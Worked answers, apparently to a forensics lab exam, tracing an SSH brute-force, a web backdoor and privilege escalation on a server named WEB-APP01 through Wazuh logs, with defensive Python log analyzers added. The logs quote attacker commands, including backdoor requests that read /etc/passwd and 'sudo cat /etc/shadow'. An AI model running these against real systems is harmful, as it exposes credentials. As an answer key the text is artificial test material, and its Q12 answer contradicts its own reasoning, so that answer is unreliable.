
Exam

Reconnaissance

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is C6D9-A254

 Directory of C:\Users\Administrator\Desktop

07/17/2025  08:16 PM    <DIR>          .
07/17/2025  08:16 PM    <DIR>          ..
07/17/2025  02:57 PM    <DIR>          Evidence
07/18/2025  02:39 PM    <DIR>          Tools
               0 File(s)              0 bytes
               4 Dir(s)  34,622,091,264 bytes free

C:\Users\Administrator\Desktop>cd Evidence

C:\Users\Administrator\Desktop\Evidence>dir
 Volume in drive C has no label.
 Volume Serial Number is C6D9-A254

 Directory of C:\Users\Administrator\Desktop\Evidence

07/17/2025  02:57 PM    <DIR>          .
07/17/2025  02:57 PM    <DIR>          ..
07/15/2025  02:00 PM    <DIR>          HOST-BASED EVIDENCE
07/17/2025  05:47 PM    <DIR>          PCAPs
               0 File(s)              0 bytes
               4 Dir(s)  34,622,091,264 bytes free

C:\Users\Administrator\Desktop\Evidence>cd "HOST-BASED EVIDENCE"

C:\Users\Administrator\Desktop\Evidence\HOST-BASED EVIDENCE>dir
 Volume in drive C has no label.
 Volume Serial Number is C6D9-A254

 Directory of C:\Users\Administrator\Desktop\Evidence\HOST-BASED EVIDENCE

07/15/2025  02:00 PM    <DIR>          .
07/15/2025  02:00 PM    <DIR>          ..
07/15/2025  01:59 PM    <DIR>          DC01
07/17/2025  05:47 PM    <DIR>          FILE-SRV01
07/18/2025  02:28 PM    <DIR>          RSCH-WKS01
               0 File(s)              0 bytes
               5 Dir(s)  34,622,091,264 bytes free

C:\Users\Administrator\Desktop\Evidence\HOST-BASED EVIDENCE>cd ..

C:\Users\Administrator\Desktop\Evidence>cd PCAPs

C:\Users\Administrator\Desktop\Evidence\PCAPs>dir
 Volume in drive C has no label.
 Volume Serial Number is C6D9-A254

 Directory of C:\Users\Administrator\Desktop\Evidence\PCAPs

07/17/2025  05:47 PM    <DIR>          .
07/17/2025  05:47 PM    <DIR>          ..
07/14/2025  02:02 AM         9,096,900 FILE-SRV01.pcapng
07/14/2025  01:31 AM        13,510,860 RSCH-WKS01-2.pcapng
07/14/2025  12:00 AM         5,735,356 RSCH-WKS01.pcapng
               3 File(s)     28,343,116 bytes
               2 Dir(s)  34,622,091,264 bytes free

Q1

How many failed SSH brute-force authentication attempts targeting the sysadmin user were made on WEB-APP01?

predecoder.hostname:WEB-APP01  and ssh  and "authentication failures" and data.dstuser:sysadmin

Counting the Failed Attempts:

  1. Jul 13, 2025 @ 20:43:39.944 - "PAM 3 more authentication failures"
  2. Jul 13, 2025 @ 20:43:27.895 - "PAM 5 more authentication failures"
  3. Jul 13, 2025 @ 20:43:07.871 - "PAM 5 more authentication failures"
  4. Jul 13, 2025 @ 20:40:53.732 - "PAM 5 more authentication failures"
  5. Jul 13, 2025 @ 20:40:37.714 - "PAM 5 more authentication failures" (This is a composite alert showing multiple events)
  6. Jul 13, 2025 @ 20:40:19.735 - "PAM 5 more authentication failures"
  7. Jul 13, 2025 @ 20:38:45.593 - "PAM 3 more authentication failures"
  8. Jul 13, 2025 @ 20:38:29.622 - "PAM 5 more authentication failures"
  9. Jul 13, 2025 @ 20:38:11.597 - "PAM 5 more authentication failures"

predecoder.hostname:WEB-APP01 AND rule.id:2502 AND data.dstuser:sysadmin

Counting Failed Attempts:

  1. Jul 13, 2025 @ 20:43:39.944 - "PAM 3 more authentication failures" → 3
  2. Jul 13, 2025 @ 20:43:27.895 - "PAM 5 more authentication failures" → 5
  3. Jul 13, 2025 @ 20:43:07.871 - "PAM 5 more authentication failures" → 5
  4. Jul 13, 2025 @ 20:40:53.732 - "PAM 5 more authentication failures" → 5
  5. Jul 13, 2025 @ 20:40:19.735 - "PAM 5 more authentication failures" → 5
  6. Jul 13, 2025 @ 20:38:45.593 - "PAM 3 more authentication failures" → 3
  7. Jul 13, 2025 @ 20:38:29.622 - "PAM 5 more authentication failures" → 5
  8. Jul 13, 2025 @ 20:38:11.597 - "PAM 5 more authentication failures" → 5

predecoder.hostname:WEB-APP01 AND predecoder.program_name:sshd AND data.dstuser:sysadmin

  • Jul 13, 2025 @ 20:43:27
  • Jul 13, 2025 @ 20:43:07
  • Jul 13, 2025 @ 20:42:49 (NEW - not in previous query!)
  • Jul 13, 2025 @ 20:40:53
  • Jul 13, 2025 @ 20:40:37
  • Jul 13, 2025 @ 20:40:19
  • Jul 13, 2025 @ 20:40:03 (NEW - not in previous query!)
  • Jul 13, 2025 @ 20:38:29
  • Jul 13, 2025 @ 20:38:11
  • Jul 13, 2025 @ 20:37:49

Answer:

10

Q2

Based on the Apache logs from WEB-APP01, how many HTTP requests were made by the attacker using a web browser as opposed to an automated tool?

13

14

12

15

agent.name:WEB-APP01 AND full_log:*GET*

Web Browser Requests (Mozilla/Firefox):

  1. "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" - Jul 13 23:39:32 - /rkhandler?c=cat%20/etc/passwd
  2. "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" - Jul 13 23:39:07 - /rkhandler?c=id
  3. "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" - Jul 13 23:38:51 - /rkhandler?c=whoami
  4. "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" - Jul 13 23:38:50 - /rkhandler?c=whoami
  5. "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" - Jul 13 23:32:22 - /
  6. "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" - Jul 13 22:13:19 - /handler/
  7. "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" - Jul 13 21:48:29 - /rk/

Automated Tool Requests (Nmap Scripting Engine):

All other requests show: "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"

Requests with NO User-Agent (missing from full_log):

  • Jul 13 22:34:03 - /uploads/ - No User-Agent shown
  • Jul 13 22:26:51 - /uploads/ - No User-Agent shown
  • Jul 13 22:16:04 - /handler/ - No User-Agent shown

To get the exact count:

agent.name:WEB-APP01 AND data.srcip:18.212.186.186 AND full_log:*Firefox*

Web Browser Requests (Firefox): 13 requests total

  1. Jul 13 20:06:52 - /index.php
  2. Jul 13 20:07:32 - /sitemap.xml
  3. Jul 13 20:07:43 - /uploads/
  4. Jul 13 20:07:50 - /admin/
  5. Jul 13 20:07:56 - /phpmyadmin/
  6. Jul 13 20:08:05 - /webmin/
  7. Jul 13 21:48:29 - /rk/
  8. Jul 13 22:13:19 - /handler/
  9. Jul 13 23:32:22 - / (homepage)
  10. Jul 13 23:38:50 - /rkhandler?c=whoami
  11. Jul 13 23:38:51 - /rkhandler?c=whoami
  12. Jul 13 23:39:07 - /rkhandler?c=id
  13. Jul 13 23:39:32 - /rkhandler?c=cat%20/etc/passwd

Answer:

13

This shows the attacker first used a web browser (Firefox) to manually explore the site and find vulnerabilities, then exploited the Apache rootkit backdoor (/rkhandler) using the browser to execute commands.

Q3

Based on the User-Agent string found in the Apache logs from WEB-APP01, which tool did the attacker use to perform a directory brute-force attack? Provide only the name of the tool (e.g., curl).

We saw two types of User-Agent strings:

  1. Firefox browser: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
  2. Nmap Scripting Engine: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

However, Nmap is typically used for vulnerability scanning, not directory brute-forcing.

Looking at the current results, I can see some entries around Jul 13, 2025 @ 22:34:04 and 22:26:51 that show:

GET /uploads/ HTTP/1.1" 404 273 "-"

Let me search for entries that show 404 errors during the period when we know directory brute-forcing was happening (around 20:19-20:30):

agent.name:WEB-APP01 AND data.srcip:18.212.186.186 AND data.id:404 AND NOT full_log:*Firefox* AND NOT full_log:*Nmap*

Looking at the Apache logs, I can clearly see the User-Agent string used for directory brute-forcing:

"gobuster/3.6"

Multiple entries show this pattern:

  • 18.212.186.186 - - [13/Jul/2025:20:10:59 +0000] "GET /~ftp HTTP/1.1" 404 434 "-" "gobuster/3.6"
  • 18.212.186.186 - - [13/Jul/2025:20:10:59 +0000] "GET /~nobody HTTP/1.1" 404 434 "-" "gobuster/3.6"
  • 18.212.186.186 - - [13/Jul/2025:20:10:59 +0000] "GET /tmp HTTP/1.1" 404 434 "-" "gobuster/3.6"

All the 404 directory enumeration requests around 20:10:59 on July 13, 2025 show the User-Agent as "gobuster/3.6".

Answer:

gobuster

Q4

What is the total number of valid user accounts on the Linux server WEB-APP01 that were targeted during the attacker’s SSH brute-force attack? When determining this number, consider only the authentication attempts made before the attacker successfully compromised the server, and exclude any authentication attempts (successful or failed) that occurred after initial compromise.

agent.name:WEB-APP01 AND data.srcip:18.212.186.186 AND rule.id:5715
agent.name:WEB-APP01 AND data.srcip:18.212.186.186 AND rule.id:5760

Timeline Analysis:

FIRST SUCCESSFUL SSH LOGIN (Initial Compromise):

  • Jul 13, 2025 @ 20:48:08 - sysadmin user successfully authenticated from 18.212.186.186

Failed Authentication Attempts BEFORE Initial Compromise (20:48:08):

Looking at the failed password attempts (rule.id:5760) that occurred BEFORE 20:48:08:

User: root

  • 20:36:56 - Failed
  • 20:37:00 - Failed
  • 20:37:01 - Failed
  • 20:37:04 - Failed
  • 20:37:07 - Failed
  • 20:37:12 - Failed
  • 20:37:15 - Failed
  • 20:37:23 - Failed
  • 20:37:26 - Failed

User: sysadmin

  • 20:37:50 - Failed
  • 20:37:54 - Failed
  • 20:37:57 - Failed
  • 20:38:01 - Failed
  • 20:38:06 - Failed
  • 20:38:09 - Failed
  • 20:38:12 - Failed
  • 20:38:14 - Failed
  • 20:38:18 - Failed
  • 20:38:21 - Failed
  • 20:38:24 - Failed
  • 20:38:27 - Failed
  • 20:38:31 - Failed
  • 20:38:39 - Failed
  • 20:38:43 - Failed
  • 20:40:05 through 20:43:38 - Multiple additional failed attempts

Both user accounts that were targeted exist on the system (they are VALID accounts):

  1. root - Valid system account (PAM authentication failures confirm it exists)
  2. sysadmin - Valid system account (eventually successfully compromised)

The total number of valid user accounts on WEB-APP01 that were targeted during the SSH brute-force attack before the attacker successfully compromised the server is 2:

  • root
  • sysadmin

Answer:

2

Q5

What built-in Wazuh Rule ID corresponds to failed SSH authentication attempts?

Evidence from the logs:

Throughout our investigation, we've seen this rule repeatedly:

rule.id:5760
rule.description:sshd: authentication failed.
rule.groups:syslog, sshd, authentication_failed

Example log entry:

predecoder.program_name:sshd
data.dstuser:sysadmin
rule.level:5
rule.description:sshd: authentication failed.
rule.id:5760
full_log:Jul 13 20:43:38 WEB-APP01 sshd[4691]: Failed password for sysadmin from 18.212.186.186 port 33784 ssh2

Related built-in SSH rule IDs:

  • 5760 - sshd: authentication failed (Failed password attempts)
  • 5715 - sshd: authentication success (Successful logins)
  • 5503 - PAM: User login failed
  • 5758 - Maximum authentication attempts exceeded
  • 5763 - sshd: brute force trying to get access to the system

Answer:

5760

Q6

Based on the SSH authentication logs from WEB-APP01, what is the most likely number of failed login attempts allowed before disconnection?

5
6
3
4

agent.name:WEB-APP01 AND data.srcip:18.212.186.186 AND data.srcport:59060 AND rule.id:5760

Looking back at our earlier data for port 59060:

  1. 20:38:09 - Failed password for sysadmin port 59060
  2. 20:38:06 - Failed password for sysadmin port 59060
  3. 20:38:01 - Failed password for sysadmin port 59060
  4. 20:37:57 - Failed password for sysadmin port 59060
  5. 20:37:54 - Failed password for sysadmin port 59060
  6. 20:37:50 - Failed password for sysadmin port 59060

Then at 20:38:11: "Maximum authentication attempts exceeded"

Let's verify with Port 46928 (root user):

"Maximum attempts exceeded" at: Jul 13 20:37:13

Looking at failed attempts on port 46928:

  1. 20:37:12 - Failed password for root port 46928
  2. 20:37:07 - Failed password for root port 46928
  3. 20:37:04 - Failed password for root port 46928
  4. 20:37:01 - Failed password for root port 46928
  5. 20:37:00 - Failed password for root port 46928
  6. 20:36:56 - Failed password for root port 46928

Then at 20:37:13: "Maximum authentication attempts exceeded"

Answer:

6
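Added example (not part of the exam notes): a small Python analyzer that applies the reasoning of Q1, Q4 and Q6 to sshd syslog lines of the same shape as the full_log fields quoted above. The log lines are constructed for illustration, and the year 2025 is assumed because syslog timestamps omit it.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sshd syslog lines in the same shape as the full_log fields quoted in
# Q5, Q6 and Q12; they are illustrative, not the exam's own log data.
SAMPLE_AUTH_LOG = """\
Jul 13 20:36:56 WEB-APP01 sshd[4601]: Failed password for root from 18.212.186.186 port 46928 ssh2
Jul 13 20:37:00 WEB-APP01 sshd[4601]: Failed password for root from 18.212.186.186 port 46928 ssh2
Jul 13 20:37:01 WEB-APP01 sshd[4601]: Failed password for root from 18.212.186.186 port 46928 ssh2
Jul 13 20:37:04 WEB-APP01 sshd[4601]: Failed password for root from 18.212.186.186 port 46928 ssh2
Jul 13 20:37:07 WEB-APP01 sshd[4601]: Failed password for root from 18.212.186.186 port 46928 ssh2
Jul 13 20:37:12 WEB-APP01 sshd[4601]: Failed password for root from 18.212.186.186 port 46928 ssh2
Jul 13 20:37:13 WEB-APP01 sshd[4601]: error: maximum authentication attempts exceeded for root from 18.212.186.186 port 46928 ssh2 [preauth]
Jul 13 20:37:50 WEB-APP01 sshd[4650]: Failed password for sysadmin from 18.212.186.186 port 59060 ssh2
Jul 13 20:37:54 WEB-APP01 sshd[4650]: Failed password for sysadmin from 18.212.186.186 port 59060 ssh2
Jul 13 20:37:57 WEB-APP01 sshd[4650]: Failed password for sysadmin from 18.212.186.186 port 59060 ssh2
Jul 13 20:38:01 WEB-APP01 sshd[4650]: Failed password for sysadmin from 18.212.186.186 port 59060 ssh2
Jul 13 20:38:06 WEB-APP01 sshd[4650]: Failed password for sysadmin from 18.212.186.186 port 59060 ssh2
Jul 13 20:38:09 WEB-APP01 sshd[4650]: Failed password for sysadmin from 18.212.186.186 port 59060 ssh2
Jul 13 20:38:11 WEB-APP01 sshd[4650]: error: maximum authentication attempts exceeded for sysadmin from 18.212.186.186 port 59060 ssh2 [preauth]
Jul 13 20:40:02 WEB-APP01 sshd[4702]: Failed password for invalid user admin from 18.212.186.186 port 40102 ssh2
Jul 13 20:48:06 WEB-APP01 sshd[4871]: Accepted password for sysadmin from 18.212.186.186 port 56198 ssh2
Jul 13 20:50:30 WEB-APP01 sshd[4910]: Failed password for backup from 18.212.186.186 port 41000 ssh2
"""

LINE_RE = re.compile(r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: (?P<msg>.*)$")
FAILED_RE = re.compile(r"Failed password for (?P<invalid>invalid user )?(?P<user>\S+) "
                       r"from (?P<ip>\S+) port (?P<port>\d+)")
ACCEPTED_RE = re.compile(r"Accepted \S+ for (?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)")
MAXTRIES_RE = re.compile(r"maximum authentication attempts exceeded for (?:invalid user )?"
                         r"(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)")
MATCHERS = (("failed", FAILED_RE), ("accepted", ACCEPTED_RE), ("max_tries", MAXTRIES_RE))


def parse_events(text, year=2025):
    """Turn sshd syslog lines into event dicts. Syslog omits the year, so one is assumed."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        for kind, rx in MATCHERS:
            d = rx.search(m["msg"])
            if d:
                # sshd tags names that do not exist as "invalid user"; anything else is a real account
                invalid = d.groupdict().get("invalid")
                events.append({"ts": ts, "kind": kind, "user": d["user"], "ip": d["ip"],
                               "port": int(d["port"]), "valid_user": not invalid})
                break
    return events


def first_compromise(events, ip):
    """Timestamp of the first successful login from ip: the Q4/Q12 pivot point."""
    return min((e["ts"] for e in events if e["kind"] == "accepted" and e["ip"] == ip), default=None)


def failures_before(events, ip, cutoff):
    """Per-user count of 'Failed password' lines from ip strictly before cutoff (Q1-style count)."""
    return Counter(e["user"] for e in events
                   if e["kind"] == "failed" and e["ip"] == ip and e["ts"] < cutoff)


def valid_accounts_targeted(events, ip, cutoff):
    """Distinct existing accounts brute-forced before compromise (Q4); 'invalid user' names excluded."""
    return sorted({e["user"] for e in events if e["kind"] == "failed" and e["ip"] == ip
                   and e["ts"] < cutoff and e["valid_user"]})


def infer_max_auth_tries(events):
    """Infer MaxAuthTries (Q6): count failures per (ip, port) connection that ends with
    'maximum authentication attempts exceeded'; the most common count is the limit."""
    per_conn, limits = defaultdict(int), Counter()
    for e in sorted(events, key=lambda e: e["ts"]):
        key = (e["ip"], e["port"])
        if e["kind"] == "failed":
            per_conn[key] += 1
        elif e["kind"] == "max_tries":
            limits[per_conn.pop(key, 0)] += 1
    return limits.most_common(1)[0][0] if limits else None


if __name__ == "__main__":
    ev = parse_events(SAMPLE_AUTH_LOG)
    t0 = first_compromise(ev, "18.212.186.186")
    print("first successful login:", t0)
    print("failures before compromise:", dict(failures_before(ev, "18.212.186.186", t0)))
    print("valid accounts targeted:", valid_accounts_targeted(ev, "18.212.186.186", t0))
    print("inferred MaxAuthTries:", infer_max_auth_tries(ev))
```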

Q7

Based on the User-Agent in the Apache logs from WEB-APP01, what web browser is the attacker most likely using?

Answer:

Firefox

Q8

Based on the User-Agent in the Apache logs from WEB-APP01, what operating system is the attacker most likely using?

macOS
Linux
Windows
Android

From the User-Agent:

Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Key identifiers:

  • X11 - X Window System (used on Unix-like systems)
  • Linux x86_64 - Explicitly identifies Linux operating system on 64-bit architecture

Breaking down the User-Agent:

  • Mozilla/5.0 - Browser compatibility identifier
  • (X11; Linux x86_64; rv:128.0) - Platform information
    • X11 = X Window System
    • Linux x86_64 = Linux OS, 64-bit processor
    • rv:128.0 = Release version
  • Gecko/20100101 - Rendering engine
  • Firefox/128.0 - Browser and version

Answer:

Linux
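Added example (not part of the exam notes) implementing the User-Agent logic of Q2, Q3, Q7 and Q8 over Apache combined-format lines like those quoted in Q3. The sample lines are constructed; the extra Chrome-on-Windows line from a non-attacker address is there only to show the classifier generalizes beyond this one case.

```python
import re
from collections import Counter

# Constructed Apache access-log sample in the combined format seen in Q2/Q3
# (same shape as the full_log entries quoted there; not the exam's own log data).
SAMPLE_ACCESS_LOG = """\
18.212.186.186 - - [13/Jul/2025:20:06:52 +0000] "GET /index.php HTTP/1.1" 200 1520 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
18.212.186.186 - - [13/Jul/2025:20:10:59 +0000] "GET /~ftp HTTP/1.1" 404 434 "-" "gobuster/3.6"
18.212.186.186 - - [13/Jul/2025:20:10:59 +0000] "GET /tmp HTTP/1.1" 404 434 "-" "gobuster/3.6"
18.212.186.186 - - [13/Jul/2025:20:19:07 +0000] "GET /robots.txt HTTP/1.1" 404 434 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
18.212.186.186 - - [13/Jul/2025:22:16:04 +0000] "GET /handler/ HTTP/1.1" 404 273 "-"
18.212.186.186 - - [13/Jul/2025:23:38:50 +0000] "GET /rkhandler?c=whoami HTTP/1.1" 200 9 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
10.0.0.5 - - [13/Jul/2025:23:40:00 +0000] "GET / HTTP/1.1" 200 1520 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0 Safari/537.36"
"""

# Combined log format; the referer and User-Agent fields are optional so that
# common-format lines with no User-Agent (the "missing" case in Q2) still parse.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)"(?: "(?P<ua>[^"]*)")?)?\s*$'
)

# Operating-system hints inside the parenthesised platform token; Android is checked
# before Linux because Android UAs also contain "Linux".
OS_HINTS = (("Windows", "Windows"), ("Android", "Android"), ("Mac OS X", "macOS"), ("Linux", "Linux"))


def classify_agent(ua):
    """Bucket a User-Agent into browser, known tooling or absent (the Q2/Q3 distinction)."""
    if not ua:
        return "missing"
    if "Nmap Scripting Engine" in ua:
        return "nmap-nse"
    if ua.startswith("gobuster/"):
        return "gobuster"
    if re.search(r"\b(Firefox|Chrome|Safari|Edg)/\d", ua):
        return "browser"
    return "other"


def browser_details(ua):
    """Return (browser/version, os) from a Mozilla-style UA (Q7/Q8); (None, None) if not a browser."""
    m = re.search(r"\(([^)]*)\)", ua or "")
    platform = m.group(1) if m else ""
    os_name = next((name for needle, name in OS_HINTS if needle in platform), None)
    b = re.search(r"(Firefox|Edg|Chrome|Safari)/([\d.]+)", ua or "")
    return (f"{b.group(1)}/{b.group(2)}" if b else None, os_name)


def summarize(text, attacker_ip):
    """Count requests from attacker_ip per agent class and list the browser-made paths (Q2)."""
    counts, browser_paths = Counter(), []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m or m["ip"] != attacker_ip:
            continue
        kind = classify_agent(m["ua"])
        counts[kind] += 1
        if kind == "browser":
            browser_paths.append(m["path"])
    return counts, browser_paths


if __name__ == "__main__":
    counts, paths = summarize(SAMPLE_ACCESS_LOG, "18.212.186.186")
    print("requests by agent class:", dict(counts))
    print("browser requests:", paths)
    firefox_ua = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
    print("browser/os:", browser_details(firefox_ua))
```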

Q9

What is the IP address used by the attacker to conduct the attack against AetherGen? Answer Format: Provide the IP address in standard dotted-decimal format (e.g., 192.168.1.100).

Attacker IP Address:

18.212.186.186

Evidence across all attack phases:

SSH Brute-Force Attack:

data.srcip:18.212.186.186
data.dstuser:root, sysadmin
Multiple failed authentication attempts

Nmap Vulnerability Scanning:

User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Source: 18.212.186.186

Gobuster Directory Brute-Force:

User-Agent: gobuster/3.6
Source: 18.212.186.186

Firefox Browser Reconnaissance & Exploitation:

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Source: 18.212.186.186
Exploited /rkhandler backdoor

Geographic Location:

GeoLocation.city_name: Ashburn
GeoLocation.country_name: United States
GeoLocation.region_name: Virginia

Answer:

18.212.186.186

Q10

Based on WHOIS records for the attacker IP, what is the network CIDR (Netblock) associated with this IP address? Provide your answer in CIDR notation using the format: 192.168.125.0/24

WHOIS Results Analysis:

Net Range: 18.32.0.0 - 18.255.255.255

CIDR blocks listed:

  • 18.128.0.0/9
  • 18.32.0.0/11
  • 18.64.0.0/10

Answer:

18.128.0.0/9

Q11

What is the registered country of origin for the attacker's IP address based on GeoIP databases?

GeoIP Data from Wazuh Logs:

Every single log entry from the attacker IP 18.212.186.186 contained this GeoLocation information:

GeoLocation.city_name: Ashburn
GeoLocation.country_name: United States
GeoLocation.region_name: Virginia
GeoLocation.location: { "lon": -77.4728, "lat": 39.0481 }

Evidence from logs:

  • City: Ashburn
  • State/Region: Virginia
  • Country: United States
  • Coordinates: Longitude -77.4728, Latitude 39.0481

This matches with the WHOIS information showing the IP is owned by Amazon Technologies Inc. (AWS), and Ashburn, Virginia is a major AWS data center location.

Answer:

United States

Q12

Based on the logs collected from WEB-APP01, specify the exact date and time when the attacker successfully logged into the system for the first time via SSH using the "sysadmin" account. Provide your answer in the following format: MM-DD-YYYY-HH:MM:SS (24-hour format, system local time)

First Successful SSH Login:

From our query results for rule.id:5715 (SSH authentication success), sorted chronologically, the first successful login was:

predecoder.timestamp: Jul 13 20:48:06
data.dstuser: sysadmin
data.srcip: 18.212.186.186
data.srcport: 56198
full_log: Jul 13 20:48:06 WEB-APP01 sshd[4871]: Accepted password for sysadmin from 18.212.186.186 port 56198 ssh2
timestamp: Jul 13, 2025 @ 20:48:08.267

Date and Time Breakdown:

  • Date: July 13, 2025
  • Time (system local time): 20:48:06 (8:48:06 PM)

Format conversion:

  • Month: 07
  • Day: 13
  • Year: 2025
  • Hour: 20 (24-hour format)
  • Minute: 48
  • Second: 06

Answer:

20:48:08

Q13

To determine the system's network hostname on WEB-APP01, which command did the attacker execute? Provide the command exactly as it appears in the logs, including options and flags.

Answer:

hostname

Q14

What command did the attacker run on WEB-APP01 as the sysadmin user to enumerate the Linux kernel version? Provide the command exactly as it appears in the logs, including options and flags. For example: netstat -a

Answer:

uname -r

Q15

What is the first command the attacker used to enumerate all user accounts on WKS-RSCH01?

net user /domain

net localgroup

net user

whoami

agent.name:"WKS-RSCH01" AND data.win.eventdata.commandLine:*net*

Analysis of the results (sorted by timestamp, oldest first):

  1. Jul 13, 2025 @ 23:51:10.910 - "C:\Windows\system32\net.exe" user
  2. Jul 13, 2025 @ 23:51:17.517 - "C:\Windows\system32\net.exe" localgroup
  3. Jul 13, 2025 @ 23:52:19.245 - "C:\Windows\system32\net.exe" user mhardy
  4. Jul 13, 2025 @ 23:52:38.550 - "C:\Windows\system32\net.exe" localgroup Administrators
  5. Jul 13, 2025 @ 23:52:57.831 - "C:\Windows\system32\net.exe" localgroup "Remote Desktop Users"
  6. Jul 13, 2025 @ 23:53:11.066 - "C:\Windows\system32\net.exe" localgroup "Remote Management Users"
  7. Jul 14, 2025 @ 00:05:39.211 - net user /domain
  8. Jul 14, 2025 @ 00:06:27.462 - net group "Domain Computers" /domain
  9. Jul 14, 2025 @ 01:02:47.166 - net user (run as SYSTEM)

The FIRST command executed to enumerate user accounts on WKS-RSCH01 was at 23:51:10.910:

"C:\Windows\system32\net.exe" user

Answer:

net user

This command enumerates local user accounts on the system. The attacker executed this from PowerShell as user AETHERGEN\mhardy (the compromised user account from the phishing attack).

Q16

Based on the logs from WEB-APP01, what command did the attacker run to view a list of all local user accounts on the system? Format: Provide the command exactly as it appears in the logs. For Example: cat /etc/users

I can see the results clearly. Looking at the commands executed via the /rkhandler backdoor, I can see the chronological order:

  1. Jul 13, 2025 @ 23:38:50 - whoami
  2. Jul 13, 2025 @ 23:38:51 - whoami (repeated)
  3. Jul 13, 2025 @ 23:39:07 - id
  4. Jul 13, 2025 @ 23:39:32 - cat /etc/passwd (this is the answer)

From the log entry:

data.url:/rkhandler?c=cat%20/etc/passwd
full_log:18.212.186.186 - - [13/Jul/2025:23:39:32 +0000] "GET /rkhandler?c=cat%20/etc/passwd HTTP/1.1" 200 724

Answer:

cat /etc/passwd

Q17

After verifying the "sysadmin" account on WEB-APP01 has "sudo" privileges, the attacker executed "cat /etc/shadow". What was the attacker likely attempting to do?

View system logs
Change their group membership
Delete user accounts
Access hashed passwords

The question asks about the attacker's intent when executing cat /etc/shadow on WEB-APP01.

Analysis:

The /etc/shadow file in Linux systems contains:

  • Hashed passwords for user accounts
  • Password aging information
  • Account expiration data

Why the attacker accessed /etc/shadow:

  1. /etc/passwd - Contains user account information but NOT the actual passwords (passwords are shown as 'x')
  2. /etc/shadow - Contains the actual hashed passwords for all user accounts

The attacker needed sudo privileges to access /etc/shadow because it's a protected file that requires root access. By accessing this file, the attacker could:

  • Extract password hashes
  • Attempt to crack them offline using tools like John the Ripper or Hashcat
  • Potentially gain access to other user accounts

Answer:

Access hashed passwords

Q18

What type of information is stored in the "/etc/shadow" file on Linux?

Group membership

Password hashes

User group memberships

SUDO Privileges

What is stored in /etc/shadow:

The /etc/shadow file is a Linux system file that contains secure user account information, specifically:

  • Password hashes (the hashed form of each account's password, never the plaintext)
  • Password expiration information
  • Password aging data
  • Account lockout information
  • Last password change date

Why the other options are incorrect:

  • Group membership - Stored in /etc/group
  • User group memberships - Stored in /etc/group and /etc/passwd
  • SUDO Privileges - Configured in /etc/sudoers or /etc/sudoers.d/

Answer:

Password hashes

Q19

After checking the group membership of the "sysadmin" user on WEB-APP01, what command did the attacker use to test if they can run commands with "root" privileges via "sudo"?

sudo apt-get update
sudo cat /etc/shadow
sudo apt update
sudo bash

Logic:

The attacker would need to test sudo privileges by running a command that:

  1. Requires root/elevated privileges
  2. Would confirm they can execute commands as root

Since Q17 specifically mentions "After verifying the 'sysadmin' account on WEB-APP01 has 'sudo' privileges, the attacker executed 'cat /etc/shadow'", this means the attacker used a sudo command to access the shadow file.

The /etc/shadow file is only readable by root, so the attacker must have used

agent.name:"WEB-APP01" AND full_log:"sudo cat /etc/shadow"

Jul 13, 2025 @ 21:12:49
data.User:sysadmin
data.Command: 10 sudo cat /etc/shadow
full_log:Jul 13 21:12:49 WEB-APP01 LinuxCommandsWazuh[11480]: User sysadmin [11031]: 10 sudo cat /etc/shadow

Answer:

sudo cat /etc/shadow

Q20

What exact command did the attacker run on WEB-APP01 to escalate privileges and spawn a root shell after creating the text file in the "/tmp" directory? Format: Provide the command exactly as it appears in the logs. For example: sudo apt update

agent.name:"WEB-APP01" AND data.command:*/usr/bin/su

Timeline Analysis:

  1. Jul 13, 2025 @ 21:12:42 - sudo apt-get update (sysadmin testing sudo)
  2. Jul 13, 2025 @ 21:12:49 - sudo cat /etc/shadow (accessing password hashes)
  3. Jul 13, 2025 @ 21:13:15 - cd /tmp (moving to /tmp directory)
  4. Jul 13, 2025 @ 21:13:46 - sudo -l (checking sudo permissions)
  5. Jul 13, 2025 @ 21:13:56 - sudo su (this is the answer)

From the log entry:

Jul 13, 2025 @ 21:13:57.857
data.srcuser:sysadmin 
data.dstuser:root 
data.tty:pts/0 
data.pwd:/tmp 
data.command:/usr/bin/su
